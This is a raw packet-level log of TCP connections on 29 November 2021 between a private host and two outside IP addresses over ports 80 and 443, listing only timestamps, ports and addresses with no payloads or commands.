                                                                                                                                                    Nov 29, 2021 14:11:06.294822931 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.329330921 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.329508066 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.329538107 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.330125093 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.330380917 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.330713034 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.330892086 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.331005096 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.331269026 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.331453085 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.331497908 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.331902027 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.332091093 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.332130909 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.332451105 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.332716942 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.368079901 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.368273973 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.368402958 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.426913023 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.427087069 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427114010 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427125931 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427140951 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427162886 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427638054 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.427856922 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427885056 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.428582907 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.428894997 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.428915977 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.428929090 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429075956 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429095984 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429109097 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429135084 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429168940 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429356098 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429405928 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429528952 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429599047 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429620028 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429632902 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429646015 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429668903 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429696083 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429742098 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429790974 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429850101 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429980993 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430152893 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430174112 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430185080 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430202007 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430217981 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430569887 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430735111 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430820942 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430840969 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430866003 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430985928 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431001902 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431034088 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431082964 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431180954 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431206942 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431231022 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431360006 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431380033 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431407928 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431421995 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431457043 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431472063 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431499004 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431529999 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431647062 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431665897 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431693077 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431740046 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431850910 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.436302900 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.436345100 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.436352015 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.436512947 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.453933954 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.454161882 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.454262972 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465321064 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.465368032 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.465537071 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465667963 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465846062 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465931892 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.466198921 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.466551065 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.466820002 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.467057943 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.467324018 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.467436075 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.467731953 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.611901045 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.635694981 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.635817051 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.635941982 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.635976076 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.635996103 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636066914 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636202097 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636286974 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636528969 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636547089 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636599064 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636635065 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636776924 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636782885 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636817932 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636904955 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636990070 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637052059 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637150049 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637203932 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637273073 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637345076 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637413025 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637428999 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637564898 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637701035 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637810946 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637921095 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.638077021 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.638256073 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.638292074 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.707664967 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.707788944 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.707974911 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.707989931 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806004047 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806065083 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806219101 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806305885 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806333065 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806350946 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806499004 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806575060 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806627035 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806742907 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806747913 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806936026 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806986094 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807060957 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.807099104 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807209015 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807239056 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.807317972 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807456970 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.807590008 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.807661057 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807801008 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807928085 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.808062077 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.808589935 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.808945894 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809005022 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809056044 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809168100 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809298038 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809657097 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809701920 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.809735060 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.810542107 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.810632944 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.810682058 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.865647078 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.976742983 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.976809978 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.976871014 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.976903915 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.976985931 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977133989 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977263927 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977386951 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977500916 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977612972 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977883101 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.977926016 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.978266001 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.978315115 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.978511095 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.978552103 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.978621960 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.978861094 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.979304075 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.979597092 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:07.106406927 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:07.106471062 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:07.106604099 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:07.106663942 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:14.843679905 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:14.843765974 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:14.843939066 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:14.876660109 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:14.876673937 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.068821907 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.069061041 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.078258038 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.078273058 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.078494072 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.078799963 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.080909014 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.123892069 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.252250910 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.252310991 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.252415895 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.252454042 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.252463102 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.252473116 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.252481937 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.252501011 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.252546072 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.252594948 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344491959 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.344620943 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344625950 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344667912 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344670057 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344671011 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344672918 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344717979 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.344835997 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344840050 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344883919 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344885111 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344933033 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.344935894 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.345057964 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.345186949 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.345191002 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.345235109 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.345236063 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.345237970 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.345240116 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.437525988 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.437835932 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438030958 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.438179970 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438246965 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438483000 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.438640118 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438671112 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438683033 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438694954 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438715935 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.438941956 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.439363003 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.439588070 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439614058 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439626932 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439640045 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439666033 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.439676046 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439690113 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439701080 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439712048 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.439883947 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.440026999 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.440165997 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.440196991 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.440211058 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.440232992 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.440246105 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.478432894 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.478787899 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.532824993 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.533024073 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.533067942 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.533082008 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.533725023 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.533907890 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.533943892 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.533962011 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534315109 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.534531116 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534554958 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.534576893 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.534688950 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534706116 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534734964 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534744024 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534787893 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.534883976 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.535026073 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535048008 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535067081 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535075903 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535116911 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535233974 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.535375118 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535392046 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535418034 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535428047 CET49845443192.168.11.2020.124.109.2
